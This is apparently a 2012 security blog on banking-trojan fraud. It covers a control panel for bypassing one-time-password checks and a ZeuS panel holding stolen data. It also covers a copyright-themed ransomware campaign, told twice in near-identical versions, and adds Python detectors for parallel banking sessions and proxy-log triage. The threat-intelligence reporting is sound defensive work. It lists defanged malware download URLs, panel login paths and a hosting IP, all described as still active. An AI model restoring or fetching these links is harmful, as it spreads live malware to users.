<span style="font-family: Arial; font-size: 11pt;">6. This command displays a window in the user's browsing session requesting the genuine OTP key, which the user normally types in, thinking it is a routine operation of their bank.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">7. The code entered is captured by the Trojan on the infected computer and also sent to the criminal via Jabber.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">8. The criminal enters it in the banking session they have started, validating the transfer and completing the fraud with total success.</span></div>
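<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Step 4 of this sequence (and of the same list in the English post above) is the part the bank can observe on its own side: while the victim's browser session is still open, a second login for the same account arrives from the fraudster's machine, and it is that second session that submits the transfer and, after step 8, the OTP. The Python below is an added detection heuristic for that pattern, written for this article; it is not the bank's control and not code from the post, and the event log it runs over is constructed with RFC 5737 addresses and an assumed field layout (timestamp, account, source IP, country, event type).</span></div>

```python
"""Flag transfers submitted while another session for the same account, from a
different source IP, is still active.  Added example with constructed data."""
from datetime import datetime, timedelta

SESSION_TIMEOUT = timedelta(minutes=15)   # assumed idle timeout of the bank site

# Constructed sample events: (timestamp, account, source_ip, country, event).
# acct-1 shows the pattern from the post: the victim is logged in from AR when a
# second login from another IP arrives and that session requests the transfer.
# acct-2 is a normal customer doing a transfer from a single session.
SAMPLE_EVENTS = [
    ("2012-10-08T10:00:00", "acct-1", "203.0.113.10", "AR", "login"),
    ("2012-10-08T10:00:40", "acct-1", "198.51.100.7", "MX", "login"),
    ("2012-10-08T10:02:10", "acct-1", "198.51.100.7", "MX", "transfer_request"),
    ("2012-10-08T10:03:05", "acct-1", "198.51.100.7", "MX", "otp_ok"),
    ("2012-10-08T10:05:00", "acct-2", "203.0.113.55", "CL", "login"),
    ("2012-10-08T10:07:00", "acct-2", "203.0.113.55", "CL", "transfer_request"),
    ("2012-10-08T10:08:00", "acct-2", "203.0.113.55", "CL", "otp_ok"),
    ("2012-10-08T10:09:00", "acct-2", "203.0.113.55", "CL", "logout"),
]


def find_parallel_session_transfers(events, timeout=SESSION_TIMEOUT):
    """Return one alert per transfer_request made from a session that overlaps
    another still-active session of the same account on a different IP."""
    active = {}     # (account, ip) -> (last_seen, country)
    alerts = []
    for ts, account, ip, country, event in sorted(events):
        now = datetime.fromisoformat(ts)
        # Expire sessions idle longer than the timeout before handling this event.
        for key in [k for k, (seen, _) in active.items() if now - seen > timeout]:
            del active[key]
        if event == "logout":
            active.pop((account, ip), None)
            continue
        if event == "transfer_request":
            others = [(k[1], c) for k, (_, c) in active.items()
                      if k[0] == account and k[1] != ip]
            if others:
                alerts.append({
                    "account": account,
                    "time": ts,
                    "transfer_from": (ip, country),
                    "overlapping_sessions": others,
                })
        # Any non-logout event opens or refreshes the session for this IP.
        active[(account, ip)] = (now, country)
    return alerts


if __name__ == "__main__":
    for alert in find_parallel_session_transfers(SAMPLE_EVENTS):
        print(alert)
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">On the constructed log only acct-1 is flagged, with the transfer coming from the newer Mexican session while the Argentine one is still alive. A rule like this does not need to read the OTP at all: the signal is the overlap itself, which is why the account-blocking command mentioned below is useful to the fraudster, since it cuts the victim's session short and removes the overlap after the fact.</span></div>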
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Below we show, as an exclusive, one of these Control Panels with which the criminals operate to carry out the attack against OTP (One Time Password) validation systems:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s1600/OTP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s640/OTP.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">It can be seen how the remotely connected operator receives all the victim's confidential data in real time and, when starting the fraud process, requests the necessary data through the following command menu:</span></div>
<div class="MsoNormal" style="margin-left: 247.8pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s1600/token.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s320/token.jpg" width="225" /></a></div>
<div class="MsoNormal" style="margin-left: 247.8pt;">
<span style="font-family: Arial; font-size: 11pt;">It can even send commands to lock the user's online banking account, so that the user cannot log in again once the fraud has been carried out and does not notice it.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">On the same fraudulent server infrastructure, a control panel of the old ZEUS banking trojan has also been found, fully operational and active, collecting confidential data from infected victims:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s1600/zeus.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s640/zeus.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">This ZEUS statistics panel shows the high hit rate among infected users in the countries the fraud was targeting.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Below is a very small sample of the confidential data captured by the trojan's keylogger on the infected users' machines.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s1600/grabbed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="451" src="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s640/grabbed.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-70482726015801587372012-09-25T07:07:00.001-07:002012-09-25T07:07:23.091-07:00Ransomware Trojan - intellectual property companies version<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The ransomware trojan has lately been very popular under the name "Police Trojan", because after infection the user's machine appeared locked, showing a fake police web page stating that the user is suspected of certain crimes and that the machine will remain locked until a fine of a certain amount of money is paid.</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This time a similar version of the ransomware trojan has been found, using the same fraud technique but now claiming that the victim has infringed copyright laws and demanding payment of the corresponding fine.</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">When the user's computer has been infected, the trojan redirects the user's browsing to the malicious URL:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://invalid-crew.com/start.php</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This malicious script checks the language the user has configured in the browser and displays a fake web page in that language, imitating the legitimate institutions of the user's country that protect copyright and intellectual property.</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">For Spanish users the trojan redirects to the URL:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://invalid-crew.com/payz/iframe_ES.php</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This shows the following screen, pretending to come from SGAE (General Society of Authors and Editors), the Spanish authors' society:</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s1600/ES.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s400/ES.jpg" width="400" /></a></div>
<br />
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">For Portugal: hXXp://invalid-crew.com/payz/iframe_PT.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s1600/PT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s400/PT.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">For Italy: hXXp://invalid-crew.com/payz/iframe_IT.php</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s1600/IT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s400/IT.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">For France: hXXp://invalid-crew.com/payz/iframe_FR.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s1600/FR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s400/FR.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s1600/DE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s400/DE.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The domain invalid-crew.com is hosted on the IP 95.163.68.147, belonging to the ISP Digital Networks CJSC in Russia.</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The login screen of the ransomware trojan's control panel has been located at the addresses:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://invalid-crew.com/admin/login.php</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">And:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://invalid-crew.com/bull/login.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s1600/Ransomeware-Panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s400/Ransomeware-Panel.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The control panel of the ZEMRA botnet has also been located at:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://invalid-crew.com/abc/admin/</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s400/login.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This panel controls 5384 infected user machines, a high percentage of them belonging to Latin American users.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s1600/statitics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s400/statitics.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">According to the statistics menu, the spread of the bot malware started on September 3, the peak infection day being September 5 with 2402 infected computers.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s1600/infects.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s400/infects.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">In the control panel it is also possible to follow the tasks that download different malicious binaries onto the zombie computers.</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s1600/tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s400/tasks.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The infection vectors of the trojans are still active:</span><br />
<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://95.163.68.147/abc/rat.exe</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://95.163.68.147/abc/rat1.exe</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://95.163.68.147/abc/fud.exe</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://95.163.68.147/abc/server.exe</span><br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">hXXp://95.163.68.147/abc/cgg.exe</span><br />
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-1391620761437037432012-09-23T14:57:00.001-07:002012-09-23T15:10:07.102-07:00Ransomware Trojan, SGAE version – Authors' Societies<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The ransomware trojan has lately been very popular under the name "police trojan", because after infection the victim's machine appeared locked, showing a supposed fake police page stating that the user was suspected of certain crimes and that the machine would remain locked until a fine of a certain amount of money was paid.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This time a similar version has been found, using the same fraud technique but now claiming that the user has committed a copyright-related offence and demanding payment of the corresponding fine.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">When the user's machine has been infected, the trojan redirects the user's browsing to the malicious link</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/start.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">which will check the language the user has configured in the browser in order to show the fake screen in the user's language, also imitating the legitimate institutions of that country that protect copyright and intellectual property.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">For Spanish users the trojan will lead to the address:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/payz/iframe_ES.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">which will show the following screen, pretending to come from SGAE:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s1600/ES.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="489" src="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s640/ES.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">For Portugal: hXXp://invalid-crew.com/payz/iframe_PT.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s1600/PT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s640/PT.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">For Italy: hXXp://invalid-crew.com/payz/iframe_IT.php</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s1600/IT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s640/IT.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">For France: hXXp://invalid-crew.com/payz/iframe_FR.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s1600/FR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s640/FR.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s1600/DE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s640/DE.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The domain <b><i>invalid-crew.com</i></b> is hosted on the IP 95.163.68.147, belonging to the provider Digital Networks CJSC in Russia.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The login screens of the trojan's control panel have been located at the addresses:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/admin/login.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">and</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/bull/login.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s1600/Ransomeware-Panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s400/Ransomeware-Panel.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The control panel of the ZEMRA botnet has also been located at the address:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/abc/admin/</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This panel controls 5384 infected user machines, with a fairly high percentage of Latin American users among the compromised machines.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s1600/statitics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s400/statitics.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">According to the statistics menu tracking infected bots, the malware propagation started on September 3, the peak infection day being September 5 with 2402 infected machines:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s1600/infects.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s400/infects.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This panel also lets the operator follow the tasks that download the various malicious binaries onto the zombie users' machines.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s1600/tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s400/tasks.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The infection vectors of the trojans are still active:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;"> </span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/rat.exe</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/rat1.exe</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/fud.exe</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/server.exe</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/cgg.exe</span></div>
<div class="MsoNormal">
<br /></div>
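<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Both the English and the Spanish version of this post describe the same chain: an infected machine is sent to /start.php, a localised lock screen /payz/iframe_XX.php is chosen from the browser language, and the bot binaries are served from /abc/*.exe on 95.163.68.147. The following is an added example, not code from either post: it reconstructs that chain per client from constructed Squid-format proxy log lines, using only the domain, IP and paths quoted above as indicators.</span></div>

```python
"""Proxy-log triage for the invalid-crew.com ransomware chain.

Added example, not code from either version of this post. Stages: the
trojan sends the infected machine to /start.php, which picks a localised
lock screen /payz/iframe_XX.php from the browser language; the bot
binaries are served from /abc/*.exe on the hosting IP 95.163.68.147.
Only the domain, IP and paths quoted in the post are used as indicators;
the log lines are constructed in Squid's native access.log format.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import urlsplit

CAMPAIGN_HOSTS = {"invalid-crew.com", "95.163.68.147"}
ENTRY_PATH = "/start.php"
LOCK_SCREEN = re.compile(r"^/payz/iframe_([A-Z]{2})\.php$")
PAYLOAD = re.compile(r"^/abc/[\w-]+\.exe$")

# Constructed log: one client walking the whole chain, one unrelated
# client, and one client that only reached a German lock screen.
SAMPLE_LOG = """\
1346659200.412    120 10.0.0.15 TCP_MISS/200 812 GET http://invalid-crew.com/start.php - DIRECT/95.163.68.147 text/html
1346659201.005    230 10.0.0.15 TCP_MISS/200 5120 GET http://invalid-crew.com/payz/iframe_ES.php - DIRECT/95.163.68.147 text/html
1346659203.870    940 10.0.0.15 TCP_MISS/200 331776 GET http://95.163.68.147/abc/rat.exe - DIRECT/95.163.68.147 application/octet-stream
1346659260.100     88 10.0.0.22 TCP_HIT/200 4096 GET http://news.example/index.html - NONE/- text/html
1346659300.777    210 10.0.0.31 TCP_MISS/200 5010 GET http://invalid-crew.com/payz/iframe_DE.php - DIRECT/95.163.68.147 text/html
"""


def parse_squid_line(line):
    """Native format: time elapsed client code/status bytes method URL ..."""
    fields = line.split()
    if len(fields) < 7:
        return None
    ts = datetime.fromtimestamp(float(fields[0]), tz=timezone.utc)
    return ts, fields[2], fields[6]


def classify(url):
    """Map a URL to a campaign stage, or None if it is unrelated."""
    parts = urlsplit(url)
    if parts.hostname not in CAMPAIGN_HOSTS:
        return None
    if parts.path == ENTRY_PATH:
        return "entry", None
    m = LOCK_SCREEN.match(parts.path)
    if m:
        return "lock_screen", m.group(1)   # country code of the fake page
    if PAYLOAD.match(parts.path):
        return "payload", parts.path.rsplit("/", 1)[1]
    return "other", parts.path


def triage(log_text):
    """Group campaign requests per client. The post says the redirect only
    happens on an already infected machine, so any client that loaded a
    lock screen is reported as infected, even without a payload download."""
    report = defaultdict(lambda: {"stages": [], "locale": None,
                                  "payloads": [], "infected": False})
    for line in log_text.splitlines():
        parsed = parse_squid_line(line)
        if parsed is None:
            continue
        ts, client, url = parsed
        tag = classify(url)
        if tag is None:
            continue
        stage, detail = tag
        entry = report[client]
        entry["stages"].append((ts.isoformat(), stage))
        if stage == "lock_screen":
            entry["locale"] = detail
            entry["infected"] = True
        elif stage == "payload":
            entry["payloads"].append(detail)
    return dict(report)


if __name__ == "__main__":
    for client, info in triage(SAMPLE_LOG).items():
        print(client, info)
```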
